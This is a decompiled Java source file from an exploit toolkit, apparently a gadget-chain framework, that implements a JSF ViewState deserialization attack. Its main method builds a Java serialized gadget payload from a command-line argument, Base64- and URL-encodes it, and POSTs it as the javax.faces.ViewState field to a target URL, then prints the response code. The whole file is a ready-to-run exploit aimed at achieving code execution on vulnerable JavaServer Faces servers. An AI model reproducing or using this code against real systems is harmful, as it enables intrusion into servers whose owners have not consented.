package com.ar3h.chains.core.exploit;

import com.ar3h.chains.core.RouterUtil;
import com.ar3h.chains.core.payload.PayloadType;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import org.apache.commons.codec.binary.Base64;

/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/exploit/JSF.class */
public class JSF {
    public static void main(String[] strArr) {
        if (strArr.length < 3) {
            System.err.println(JSF.class.getName() + " <view_url> <payload_arg>");
            System.exit(-1);
        }
        Object parsePayloadAndBuild = RouterUtil.parsePayloadAndBuild(PayloadType.JAVA_NATIVE_PAYLOAD, strArr[1]);
        try {
            URLConnection openConnection = new URL(strArr[0]).openConnection();
            if (!(openConnection instanceof HttpURLConnection)) {
                throw new IllegalArgumentException("Not a HTTP url");
            }
            HttpURLConnection httpURLConnection = (HttpURLConnection) openConnection;
            httpURLConnection.setDoOutput(true);
            httpURLConnection.setRequestMethod("POST");
            httpURLConnection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            OutputStream outputStream = httpURLConnection.getOutputStream();
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
            objectOutputStream.writeObject(parsePayloadAndBuild);
            objectOutputStream.close();
            outputStream.write(("javax.faces.ViewState=" + URLEncoder.encode(Base64.encodeBase64String(byteArrayOutputStream.toByteArray()), "US-ASCII")).getBytes(StandardCharsets.US_ASCII));
            outputStream.close();
            System.err.println("Have response code " + httpURLConnection.getResponseCode() + " " + httpURLConnection.getResponseMessage());
        } catch (Exception e) {
            e.printStackTrace(System.err);
        }
    }
}
